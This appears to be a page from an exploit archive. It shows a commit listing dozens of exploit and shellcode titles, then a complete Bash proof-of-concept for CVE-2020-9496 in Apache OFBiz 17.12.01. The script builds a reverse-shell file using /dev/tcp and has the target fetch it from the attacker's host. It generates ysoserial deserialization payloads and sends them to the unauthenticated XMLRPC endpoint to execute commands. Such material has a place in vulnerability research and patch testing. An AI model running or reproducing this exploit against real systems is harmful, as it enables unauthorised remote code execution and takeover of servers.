de260aeac6
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
78 lines
No EOL
3.7 KiB
Bash
Executable file
78 lines
No EOL
3.7 KiB
Bash
Executable file
# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
|
|
# Date: 2021-08-04
|
|
# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
|
|
# Vendor Homepage: https://ofbiz.apache.org/index.html
|
|
# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
|
|
# Version: 17.12.01
|
|
# Tested on: Linux
|
|
|
|
# CVE : CVE-2020-9496
|
|
|
|
# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
|
|
|
|
# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.
|
|
|
|
#!/usr/bin/env bash
|
|
|
|
# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
|
|
# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
|
|
#
|
|
# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
|
|
# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
|
|
#
|
|
# Steps to exploit:
|
|
#
|
|
# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
|
|
# Step 2: Start nc listener (Recommended 8001).
|
|
# Step 3: Run the exploit.
|
|
|
|
|
|
url='https://127.0.0.1' # CHANGE THIS
|
|
port=8443 # CHANGE THIS
|
|
|
|
function helpPanel(){
|
|
echo -e "\nUsage:"
|
|
echo -e "\t[-i] Attacker's IP"
|
|
echo -e "\t[-p] Attacker's Port"
|
|
echo -e "\t[-h] Show help pannel"
|
|
exit 1
|
|
}
|
|
|
|
|
|
function ctrl_c(){
|
|
echo -e "\n\n[!] Exiting...\n"
|
|
exit 1
|
|
}
|
|
# Ctrl + C
|
|
trap ctrl_c INT
|
|
|
|
function webRequest(){
|
|
echo -e "\n[*] Creating a shell file with bash\n"
|
|
echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
|
|
echo -e "[*] Downloading YsoSerial JAR File\n"
|
|
wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
|
|
echo -e "[*] Generating a JAR payload\n"
|
|
payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
|
|
echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
|
|
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
|
|
echo -e "[*] Generating a second JAR payload"
|
|
payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n")
|
|
echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5
|
|
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload2</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
|
|
echo -e "\n[*]Deleting Files..."
|
|
rm ysoserial-master-d367e379d9-1.jar && rm shell.sh
|
|
}
|
|
|
|
declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do
|
|
case $arg in
|
|
i) ip=$OPTARG; let parameter_enable+=1;;
|
|
p) ncport=$OPTARG; let parameter_enable+=1;;
|
|
h) helpPanel;;
|
|
esac
|
|
done
|
|
|
|
if [ $parameter_enable -ne 2 ]; then
|
|
helpPanel
|
|
else
|
|
webRequest
|
|
fi |